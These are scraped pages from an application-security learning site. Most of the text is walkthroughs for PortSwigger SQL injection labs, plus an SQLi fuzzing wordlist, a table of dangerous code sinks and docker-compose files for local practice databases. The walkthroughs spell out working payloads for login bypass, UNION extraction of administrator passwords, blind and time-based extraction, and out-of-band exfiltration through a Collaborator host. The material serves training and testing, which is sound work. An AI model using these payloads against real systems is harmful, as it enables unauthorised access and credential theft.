[llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups.md) . [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#lab-setup) Lab setup ----------------------------------------------------------------------------------------------------------------------------------------------- The page linked below shows a simple setup to start learning SQL and testing SQL injection payloads locally. One of the biggest things you can do to catapult your learning and experience is to set things up locally and test them. You'll gain a deeper understanding of systems, how they work, how they are exploited, and invaluable troubleshooting skills. It WILL set you apart from those that just rely on pre-made or hosted CTFs. [SQLi testing labs](https://appsecexplained.gitbook.io/appsecexplained/scripts/docker-compose.yml-files/sqli-testing-labs) [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#labs-list) Labs list ----------------------------------------------------------------------------------------------------------------------------------------------- #### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#sql-injection-vulnerability-in-where-clause-allowing-retrieval-of-hidden-data) SQL injection vulnerability in WHERE clause allowing retrieval of hidden data PortSwigger | free | easy | [link to lab](https://portswigger.net/web-security/sql-injection/lab-retrieve-hidden-data) Solution[](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#solution) Copy 1. Click on a search item such as gifts 2. Modify the query to include your payload /filter?category=Gifts' or 1='1 3. Send the request #### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#sql-injection-vulnerability-allowing-login-bypass) SQL injection vulnerability allowing login bypass PortSwigger | free | easy | [link to lab](https://portswigger.net/web-security/sql-injection/lab-login-bypass) Solution[](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#solution-1) Copy 1. Browse to the login page 2. Enter your payload into the username box administrator' or 1=1-- - 3. Enter any password 4. Click Log in #### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#sql-injection-attack-querying-the-database-type-and-version-on-oracle) SQL injection attack, querying the database type and version on Oracle PortSwigger | free | easy | [link to lab](https://portswigger.net/web-security/sql-injection/examining-the-database/lab-querying-database-version-oracle) Solution[](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#solution-2) #### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#sql-injection-attack-querying-the-database-type-and-version-on-mysql-and-microsoft) SQL injection attack, querying the database type and version on MySQL and Microsoft PortSwigger | free | easy | [link to lab](https://portswigger.net/web-security/sql-injection/examining-the-database/lab-querying-database-version-mysql-microsoft) Solution[](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#solution-3) #### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#sql-injection-attack-listing-the-database-contents-on-non-oracle-databases) SQL injection attack, listing the database contents on non-Oracle databases PortSwigger | free | easy | [link to lab](https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-non-oracle) Solution[](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#solution-4) #### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#sql-injection-attack-listing-the-database-contents-on-oracle) SQL injection attack, listing the database contents on Oracle PortSwigger | free | easy | [link to lab](https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-oracle) Solution[](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#solution-5) #### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#sql-injection-union-attack-determining-the-number-of-columns-returned-by-the-query) SQL injection UNION attack, determining the number of columns returned by the query PortSwigger | free | easy | [link to lab](https://portswigger.net/web-security/sql-injection/union-attacks/lab-determine-number-of-columns) Solution[](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#solution-6) #### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#sql-injection-union-attack-finding-a-column-containing-text) SQL injection UNION attack, finding a column containing text PortSwigger | free | easy | [link to lab](https://portswigger.net/web-security/sql-injection/union-attacks/lab-find-column-containing-text) Solution[](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#solution-7) #### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#sql-injection-union-attack-retrieving-data-from-other-tables) SQL injection UNION attack, retrieving data from other tables PortSwigger | free | easy | [link to lab](https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-data-from-other-tables) Solution[](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#solution-8) #### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#sql-injection-union-attack-retrieving-multiple-values-in-a-single-column) SQL injection UNION attack, retrieving multiple values in a single column PortSwigger | free | easy | [link to lab](https://portswigger.net/web-security/sql-injection/union-attacks/lab-retrieve-multiple-values-in-single-column) Solution[](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#solution-9) #### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#blind-sql-injection-with-conditional-responses) Blind SQL injection with conditional responses PortSwigger | free | medium | [link to lab](https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses) Solution[](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#solution-10) #### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#blind-sql-injection-with-conditional-errors) Blind SQL injection with conditional errors PortSwigger | free | medium | [link to lab](https://portswigger.net/web-security/sql-injection/blind/lab-conditional-errors) Solution[](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#solution-11) #### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#visible-error-based-sql-injection) Visible error-based SQL injection PortSwigger | free | medium | [link to lab](https://portswigger.net/web-security/sql-injection/blind/lab-sql-injection-visible-error-based) Solution[](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#solution-12) #### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#blind-sql-injection-with-time-delays) Blind SQL injection with time delays PortSwigger | free | medium | [link to lab](https://portswigger.net/web-security/sql-injection/blind/lab-time-delays) Solution[](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#solution-13) #### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#blind-sql-injection-with-time-delays-and-information-retrieval) Blind SQL injection with time delays and information retrieval PortSwigger | free | medium | [link to lab](https://portswigger.net/web-security/sql-injection/blind/lab-time-delays-info-retrieval) Solution[](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#solution-14) #### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#blind-sql-injection-with-out-of-band-interaction) Blind SQL injection with out-of-band interaction PortSwigger | free | medium | [link to lab](https://portswigger.net/web-security/sql-injection/blind/lab-out-of-band) Solution[](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#solution-15) #### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#blind-sql-injection-with-out-of-band-data-exfiltration) Blind SQL injection with out-of-band data exfiltration PortSwigger | free | medium | [link to lab](https://portswigger.net/web-security/sql-injection/blind/lab-out-of-band-data-exfiltration) Solution[](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#solution-16) #### [](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#sql-injection-with-filter-bypass-via-xml-encoding) SQL injection with filter bypass via XML encoding PortSwigger | free | medium | [link to lab](https://portswigger.net/web-security/sql-injection/lab-sql-injection-with-filter-bypass-via-xml-encoding) Solution[](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#solution-17) [PreviousSecond-order SQLi](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/second-order-sqli) [NextNoSQL injection](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/nosql-injection) Last updated 1 year ago Was this helpful? * [Lab setup](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#lab-setup) * [Labs list](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/sql-injection-overview/sqli-lab-setup-and-writeups#labs-list) Was this helpful? Copy 1. Select one of the filters to refine the search 2. Test for UNION attack ' UNION SELECT null FROM dual-- ' UNION SELECT null,null FROM dual-- 3. Select the database version ' UNION SELECT banner,null FROM v$version-- Copy 1. Select one of the filters to refine the search 2. Test for UNION attack ' UNION SELECT null-- - ' UNION SELECT null,null-- - 3. Select the database version ' UNION SELECT version(),null-- - Copy 1. Select one of the filters to refine the search 2. Test for UNION attack ' UNION SELECT null-- - ' UNION SELECT null,null-- - 3. List the tables in the DB ' UNION SELECT table_name,null FROM information_schema.tables-- Table name is users_[unique-value] 4. List the column names in the table ' UNION SELECT column_name,null FROM information_schema.columns WHERE table_name = 'users_[unique-value]'-- 5. Get the password for the user 'administrator' and then login ' UNION SELECT password_[unique-value],null FROM users_[unique-value] WHERE username_[unique-value]='administrator'-- Copy 1. Select one of the filters to refine the search 2. Test for UNION attack ' UNION SELECT null FROM dual-- ' UNION SELECT null,null FROM dual-- 3. List the tables in the DB ' UNION SELECT null,table_name FROM all_tables-- USERS_[unique-value] 4. Get the column names ' UNION SELECT null,column_name FROM all_tab_columns WHERE table_name=USERS_[unique-value]-- 5. Get the user information and then login ' UNION SELECT USERNAME_CPHKFO,PASSWORD_BQUKUN FROM USERS_TAGNSD-- Copy 1. Keep adding null until you find the solution ' UNION SELECT null-- - ' UNION SELECT null,null-- - ' UNION SELECT null,null,null-- - etc Copy 1. Find the number of columns ' UNION SELECT null,null,null-- 2. Test each column for text ' UNION SELECT 'a',null,null-- ' UNION SELECT null,'a',null-- ' UNION SELECT null,null,'a'-- 3. Substitute in the given text (or test with it initially) Copy 1. Figure out the number of columns and then the version ' UNION SELECT null-- ' UNION SELECT null,null-- ' UNION SELECT version(),null-- 3. Get the table names ' UNION SELECT table_name,null FROM information_schema.tables-- users 4. Looks like to unique values so we can just grab the username and password and then login ' UNION SELECT username,password FROM users-- 5. Login as the administrator Copy 1. Figure out the number of columns and which can return strings ' UNION SELECT null-- ' UNION SELECT null,null-- ' UNION SELECT 'a',null-- ' UNION SELECT null,'a'-- 2. Check the version of the DB and use CONCAT to grab the username and password ' UNION SELECT null,version()-- ' UNION SELECT null,username||password FROM users-- 3. Login with the administrator credentials to solve the lab Copy 1. Find the injectable point with the following payload and watching the Content-Length response header change ' AND 1=1-- ' AND 1=2-- 2. Get a working payload for SUBSTRING ' AND SUBSTRING('abc',1,1)='a'-- 3. Setup the payload to grab the administrators password ' AND SUBSTRING((SELECT password FROM users WHERE username='administrator'),1,1)<'m'-- 4. Setup intruder and mark the first '1' and the character to fuzz, set the attack type to cluster bomb ' AND SUBSTRING((SELECT password FROM users WHERE username='administrator'),§1§,1)='§m§'-- 5. Add the payloads a-z A-Z 0-9 for the first list, and 1-30 for the second 6. Start attack, when finished, filter by 'Welcome' 7. Login with 'administrator' and the password Copy 1. Find the injectable point with the following payload to create an error ' UNION SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE NULL END FROM dual-- ' UNION SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE NULL END FROM dual-- 2. Verify you can use SUBSTR to select the first character ' UNION SELECT CASE WHEN (SUBSTR((SELECT password FROM users WHERE username='administrator'),1,1)<'m') THEN TO_CHAR(1/0) ELSE NULL END FROM dual-- Test with > and < and = to double check you can get 200 OK 3. Add the position markers and set the attack type to cluster bomb ' UNION SELECT CASE WHEN (SUBSTR((SELECT password FROM users WHERE username='administrator'),§1§,1)='§m§') THEN TO_CHAR(1/0) ELSE NULL END FROM dual-- 4. Set the first list to 1-30. the second list to a-z 0-9 and run the attack 5. Filter out the 200 resuls and get the password 6. Login with 'administrator' and the password Copy 1. Find the injectable point with a single quote to trigger an error 2. Use the following payload to trigger a meaningful error and identify it as MSSQL ' AND SELECT CAST((SELECT password FROM users LIMIT 1) AS int)-- 3. We need to use a boolean expression ' AND CAST((SELECT 1) AS int)-- - ' AND CAST((SELECT 1) AS int)=1-- - 4. Select password from users ' AND CAST((SELECT password FROM users) AS int)=1-- - 5. Limit 1 (follow the error message) ' AND CAST((SELECT password FROM users LIMIT 1) AS int)=1-- - 6. Login to solve the lab Copy 1. Find the injection point by trying different payloads along with AND, UNION and stacked queries ; ;SELECT pg_sleep(10)-- - *Remember to encode the ; otherwise your payload may be interpreted as another cookie Copy 1. Find the injection point with the sleep payload '; SELECT pg_sleep(10)-- *Remember to encode the ; 2. Verify a conditional time delay and create a payload '; SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END '; SELECT CASE WHEN (username='administrator' AND SUBSTRING(password,§1§,1)='§a§') THEN pg_sleep(10) ELSE pg_sleep(0) END FROM users-- 3. Setup intruder as with the previous labs, select Columns and 'Response Received' List be the Response received column and the ones we want should be > 10,000 4. Login to solve the lab Copy 1. Find the injection point by fuzzing variations of the OOB payloads SELECT EXTRACTVALUE(xmltype(' %remote;]>'),'/l') FROM dual-- SELECT UTL_INADDR.get_host_address('BURP-COLLABORATOR-SUBDOMAIN')-- exec master..xp_dirtree '//BURP-COLLABORATOR-SUBDOMAIN/a'-- copy (SELECT '') to program 'nslookup BURP-COLLABORATOR-SUBDOMAIN' LOAD_FILE('\\\\BURP-COLLABORATOR-SUBDOMAIN\\a') SELECT ... INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\a'-- - ' UNION SELECT EXTRACTVALUE(xmltype(' %remote;]>'),'/l') FROM dual-- *Make sure to encode the payload otherwise you get 500 error 2. Go to 'Collaborator' and click poll now to see the results Copy 1. Find the injection point by fuzzing variations of the OOB payloads ' UNION SELECT EXTRACTVALUE(xmltype(' %remote;]>'),'/l') FROM dual-- *Don't forget to encode the payload 2. Add a concatenated SELECT statement to the payload '||(SELECT+password+FROM+users+WHERE+username='administrator')||' ' UNION SELECT EXTRACTVALUE(xmltype(' %remote;]>'),'/l') FROM dual-- 3. Clock poll now on collaborator after sending the request and login with the password that's passed as the subdomain *The full address is shown at the bottom of the page in the description section Copy 1. Find the injection point by passing in payloads such as 1+1 ' etc 2. Use Hackvertor to add a WAF bypass <@dec_entities>1 UNION SELECT password FROM users<@/dec_entities> 3. Login to solve the lab --- # Wordlists | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/scripts/wordlists.md) . [Single characters](https://appsecexplained.gitbook.io/appsecexplained/scripts/wordlists/single-characters) [SQLi](https://appsecexplained.gitbook.io/appsecexplained/scripts/wordlists/sqli) [PreviousRCE Function Check](https://appsecexplained.gitbook.io/appsecexplained/scripts/php-scripts/rce-function-check) [NextSingle characters](https://appsecexplained.gitbook.io/appsecexplained/scripts/wordlists/single-characters) Was this helpful? Was this helpful? --- # SQLi | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/scripts/wordlists/sqli.md) . [](https://appsecexplained.gitbook.io/appsecexplained/scripts/wordlists/sqli#general-sqli-fuzzing) General SQLi fuzzing ---------------------------------------------------------------------------------------------------------------------------- [](https://appsecexplained.gitbook.io/appsecexplained/scripts/wordlists/sqli#out-of-band-fuzzing) Out-of-band fuzzing -------------------------------------------------------------------------------------------------------------------------- Copy SELECT EXTRACTVALUE(xmltype(' %remote;]>'),'/l') FROM dual-- SELECT UTL_INADDR.get_host_address('BURP-COLLABORATOR-SUBDOMAIN')-- exec master..xp_dirtree '//BURP-COLLABORATOR-SUBDOMAIN/a'-- copy (SELECT '') to program 'nslookup BURP-COLLABORATOR-SUBDOMAIN' LOAD_FILE('\\\\BURP-COLLABORATOR-SUBDOMAIN\\a') SELECT ... INTO OUTFILE '\\\\BURP-COLLABORATOR-SUBDOMAIN\a'-- - [PreviousSingle characters](https://appsecexplained.gitbook.io/appsecexplained/scripts/wordlists/single-characters) [NextGetting started](https://appsecexplained.gitbook.io/appsecexplained/code-review/getting-started) Last updated 2 years ago Was this helpful? * [General SQLi fuzzing](https://appsecexplained.gitbook.io/appsecexplained/scripts/wordlists/sqli#general-sqli-fuzzing) * [Out-of-band fuzzing](https://appsecexplained.gitbook.io/appsecexplained/scripts/wordlists/sqli#out-of-band-fuzzing) Was this helpful? --- # APIs | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/apis.md) . A huge amount of internet traffic (over 80% according to Google) is API calls. Modern webapplications also often make use of APIs not just for calls to third party applications but for core functionality and communication between the client and server. It’s critical that we understand how to effectively enumerate and test APIs. I have published a course called Practical API Hacking that can be found on the TCM Academy. If you‘re curious about it feel free to check it out or drop a message on the TCM Discord if you want more info about it. [https://academy.tcm-sec.com/p/hacking-apisacademy.tcm-sec.com](https://academy.tcm-sec.com/p/hacking-apis) Feel free to checkout my course :) [PreviousClient-side prototype pollution](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/prototype-pollution/client-side-prototype-pollution) [NextAPI: BOLA](https://appsecexplained.gitbook.io/appsecexplained/common-vulns/apis/api-bola) Last updated 3 years ago Was this helpful? Was this helpful? --- # Sinks | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/code-review/sinks.md) . Vulnerability Type Java Sinks PHP Sinks Node.js Sinks **Remote Code Execution (RCE)** `Runtime.getRuntime().exec()` `ProcessBuilder.start()` `Method.invoke()` `ScriptEngine.eval()` `InitialContext.lookup()` (JNDI Injection) `shell_exec()` `exec()` `system()` `passthru()` `proc_open()` `popen()` `eval()` `assert()` `create_function()` `child_process.exec()` `child_process.execSync()` `child_process.spawn()` `vm.runInContext()` `vm.runInNewContext()` **SQL Injection (SQLi)** `Statement.executeQuery()` `Statement.executeUpdate()` `Statement.execute()` `EntityManager.createQuery()` `mysqli_query()` `mysql_query()` `pg_query()` `PDO::query()` (without prepared statements) `db.collection.find({ user: req.query.user })` (NoSQLi in MongoDB) `sequelize.query()` (raw queries) **Path Traversal / Arbitrary File Read/Write** `File(String)` `FileReader(String)` `FileWriter(String)` `Files.readAllBytes(Path)` `ZipInputStream.getNextEntry()` `file_get_contents()` `fopen()` `readfile()` `include()` `require()` `unlink()` `fs.readFileSync()` `fs.readFile()` `fs.createReadStream()` `fs.writeFileSync()` `fs.unlinkSync()` **Server-Side Request Forgery (SSRF)** `HttpURLConnection.openConnection()` `URL.openStream()` `RestTemplate.getForObject()` `WebClient.get().uri()` `file_get_contents("http://...")` `curl_exec()` `stream_context_create()` `http.get()` `axios.get()` `fetch()` `request()` **Cross-Site Scripting (XSS)** `response.getWriter().write()` `HttpServletResponse.getOutputStream().print()` JSP: `<%= userInput %>` `echo $_GET["input"];` `print($_POST["input"]);` `printf($_GET["input"]);` `exit($_GET["input"]);` `res.send(req.query.input)` `res.write(req.body.input)` `document.write(req.query.input)` (in client-side JS) **Cross-Site Request Forgery (CSRF)** `doPost(HttpServletRequest req, HttpServletResponse res)` `doPut(HttpServletRequest req, HttpServletResponse res)` `doDelete(HttpServletRequest req, HttpServletResponse res)` Forms with `method="POST"` and no CSRF token Session-modifying endpoints (`$_SESSION`, `setcookie()`) `app.post('/update', (req, res) => {...}` (without CSRF token verification) **XML External Entity (XXE) Injection** `DocumentBuilder.parse()` `SAXParser.parse()` `XMLReader.parse()` `TransformerFactory.newInstance().newTransformer().transform()` `simplexml_load_string()` `DOMDocument.loadXML()` `xml_parser_create()` `xml2js.parseString()` `libxmljs.parseXml()` **LDAP Injection** `DirContext.search()` `LdapContext.search()` `ldap_search()` `ldap_list()` `ldap_read()` `ldapClient.search()` (Node.js LDAP client) **Insecure Logging (Information Disclosure)** `Logger.info()` `Logger.debug()` `System.out.println()` `PrintWriter.println()` `error_log($_GET["input"]);` `var_dump($_POST["password"]);` `print_r($_SERVER);` `console.log(req.body.password)` `winston.log('info', req.query.debug)` **Insecure Cryptography** `MessageDigest.getInstance("MD5")` `Cipher.getInstance("DES")` `Cipher.getInstance("ECB")` `md5()` `sha1()` `crypt("plaintext", "salt")` `base64_encode()` `crypto.createHash('md5')` `crypto.createCipher('des', key)` **Insecure Session Management** `HttpSession.getAttribute()` `request.getSession(true)` `session_start();` `setcookie("PHPSESSID", ...)` `req.session.user = "admin"` (without secure flags) [PreviousGetting started](https://appsecexplained.gitbook.io/appsecexplained/code-review/getting-started) Last updated 1 year ago Was this helpful? Was this helpful? --- # Wordpress | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/scripts/docker-compose.yml-files/wordpress.md) . Copy version: '3.3' services: wordpress: depends_on: - db image: wordpress:latest volumes: - wordpress_files:/var/www/html ports: - "80:80" restart: always environment: WORDPRESS_DB_HOST: db:3306 WORDPRESS_DB_USER: wordpress WORDPRESS_DB_PASSWORD: wordpresspassword WORDPRESS_DB_NAME: wordpress db: image: mysql:latest volumes: - db_data:/var/lib/mysql ports: - "3306:3306" restart: always environment: MYSQL_ROOT_PASSWORD: myrootpassword MYSQL_DATABASE: wordpress MYSQL_USER: wordpress MYSQL_PASSWORD: wordpresspassword volumes: wordpress_files: db_data: [PreviousDocker-compose.yml files](https://appsecexplained.gitbook.io/appsecexplained/scripts/docker-compose.yml-files) [NextSQLi testing labs](https://appsecexplained.gitbook.io/appsecexplained/scripts/docker-compose.yml-files/sqli-testing-labs) Last updated 2 years ago Was this helpful? Was this helpful? --- # Single characters | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/scripts/wordlists/single-characters.md) . [](https://appsecexplained.gitbook.io/appsecexplained/scripts/wordlists/single-characters#a-z) a-z ------------------------------------------------------------------------------------------------------- Copy a b c d e f g h i j k l m n o p q r s t u v w x y z [](https://appsecexplained.gitbook.io/appsecexplained/scripts/wordlists/single-characters#a-z-1) A-Z --------------------------------------------------------------------------------------------------------- [](https://appsecexplained.gitbook.io/appsecexplained/scripts/wordlists/single-characters#special-characters) Special characters ------------------------------------------------------------------------------------------------------------------------------------- [PreviousWordlists](https://appsecexplained.gitbook.io/appsecexplained/scripts/wordlists) [NextSQLi](https://appsecexplained.gitbook.io/appsecexplained/scripts/wordlists/sqli) Last updated 2 years ago Was this helpful? * [a-z](https://appsecexplained.gitbook.io/appsecexplained/scripts/wordlists/single-characters#a-z) * [A-Z](https://appsecexplained.gitbook.io/appsecexplained/scripts/wordlists/single-characters#a-z-1) * [Special characters](https://appsecexplained.gitbook.io/appsecexplained/scripts/wordlists/single-characters#special-characters) Was this helpful? Copy A B C D E F G H I J K L M N O P Q R S T U V W X Y Z Copy ! @ # $ % ^ & * ( ) - _ = + [\ ] { } \ | ; ' " : , . < > / ? ` ~ --- # Docker-compose.yml files | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/scripts/docker-compose.yml-files.md) . Here you can find docker-compose.yml files I use to spin up environments for testing on Kali and Debian. [PreviousWAF Bypasses](https://appsecexplained.gitbook.io/appsecexplained/bypassing-controls/waf-bypasses) [NextWordpress](https://appsecexplained.gitbook.io/appsecexplained/scripts/docker-compose.yml-files/wordpress) Last updated 2 years ago Was this helpful? Was this helpful? --- # SQLi testing labs | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/scripts/docker-compose.yml-files/sqli-testing-labs.md) . You can use this script to spin up four databases, MySQL, Oracle, SQL Server and PostgreSQL. It's useful for: * Learning SQL * Testing SQL statements * Testing SQL injection payloads Copy version: '3' services: mysql: image: mysql:8.0 environment: MYSQL_ROOT_PASSWORD: root_password MYSQL_DATABASE: test_db ports: - "3306:3306" sqlserver: image: mcr.microsoft.com/mssql/server:2019-latest environment: SA_PASSWORD: "Strong!Passw0rd" ACCEPT_EULA: "Y" ports: - "1433:1433" postgres: image: postgres:13 environment: POSTGRES_PASSWORD: root_password POSTGRES_DB: test_db ports: - "5432:5432" oracle: image: oracleinanutshell/oracle-xe-11g environment: ORACLE_ALLOW_REMOTE: "true" ORACLE_DISABLE_ASYNCH_IO: "true" ORACLE_ENABLE_XDB: "false" ports: - "1521:1521" [](https://appsecexplained.gitbook.io/appsecexplained/scripts/docker-compose.yml-files/sqli-testing-labs#quick-start) Quick start -------------------------------------------------------------------------------------------------------------------------------------- ### [](https://appsecexplained.gitbook.io/appsecexplained/scripts/docker-compose.yml-files/sqli-testing-labs#postgresql) Postgresql Connect to PostgreSQL. Common commands. ### [](https://appsecexplained.gitbook.io/appsecexplained/scripts/docker-compose.yml-files/sqli-testing-labs#mysql) MySQL Connect to MySQL. Common commands. ### [](https://appsecexplained.gitbook.io/appsecexplained/scripts/docker-compose.yml-files/sqli-testing-labs#oracle) Oracle Connect to Oracle. You can install the oracle client and configure it locally on your Kali machine, but it's easier to just connect to the container and work locally there. Common commands. [PreviousWordpress](https://appsecexplained.gitbook.io/appsecexplained/scripts/docker-compose.yml-files/wordpress) [NextPHP scripts](https://appsecexplained.gitbook.io/appsecexplained/scripts/php-scripts) Last updated 2 years ago Was this helpful? * [Quick start](https://appsecexplained.gitbook.io/appsecexplained/scripts/docker-compose.yml-files/sqli-testing-labs#quick-start) * [Postgresql](https://appsecexplained.gitbook.io/appsecexplained/scripts/docker-compose.yml-files/sqli-testing-labs#postgresql) * [MySQL](https://appsecexplained.gitbook.io/appsecexplained/scripts/docker-compose.yml-files/sqli-testing-labs#mysql) * [Oracle](https://appsecexplained.gitbook.io/appsecexplained/scripts/docker-compose.yml-files/sqli-testing-labs#oracle) Was this helpful? Copy psql -h localhost -p 5432 -U postgres -W Copy # List databases \l \list # Connect to a database \c # List tables \dt # Basic query SELECT * FROM ; Copy mysql -h localhost -P 3306 -u root -p Copy # List databases SHOW DATABASES; # Connect to a database USE ; # List tables SHOW TABLES; # Basic query SELECT * FROM ; Copy # Connect to your container sudo docker ps -a sudo docker exec -it bash sqlplus system/oracle@localhost:1521/xe Copy # List tables SELECT table_name FROM user_tables; # Basic query SELECT * FROM table_name; --- # Getting started | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/code-review/getting-started.md) . Coming soon - I'll be putting together a short course on code review :) [](https://appsecexplained.gitbook.io/appsecexplained/code-review/getting-started#why-code-review) Why code review? ------------------------------------------------------------------------------------------------------------------------ Before we dive into why, it's worth mentioning that this section is related to code review with the intent of finding security vulnerabilities and weaknesses within web applications. Not the typical peer review carried out be development teams. If you're interested in code review in general, this is a good place to start [https://about.gitlab.com/topics/version-control/what-is-code-review/](https://about.gitlab.com/topics/version-control/what-is-code-review/) . From now on, we'll be looking at code review to support pentesting and security research activities. There are many benefits to code review, and it's a skill that takes time to build. The main benefits are: * Easily spot certain vulnerabilities or weaknesses * Hardcoded credentials * Weak encryption * Insecure libraries or dependencies * Find hidden or complex vulnerabilities * Find malicious code (e.g. backdoors) * Achieve compliance [PreviousSQLi](https://appsecexplained.gitbook.io/appsecexplained/scripts/wordlists/sqli) [NextSinks](https://appsecexplained.gitbook.io/appsecexplained/code-review/sinks) Last updated 1 year ago Was this helpful? Was this helpful? --- # Unknown \# AppSecExplained ## AppSecExplained - \[Index < START HERE\](https://appsecexplained.gitbook.io/appsecexplained/index-less-than-start-here.md) - \[My courses\](https://appsecexplained.gitbook.io/appsecexplained/index-less-than-start-here/my-courses.md) - \[How to get started from zero\](https://appsecexplained.gitbook.io/appsecexplained/index-less-than-start-here/how-to-get-started-from-zero.md) - \[Live Stream Content\](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content.md) - \[Resource of the week\](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content/resource-of-the-week.md) - 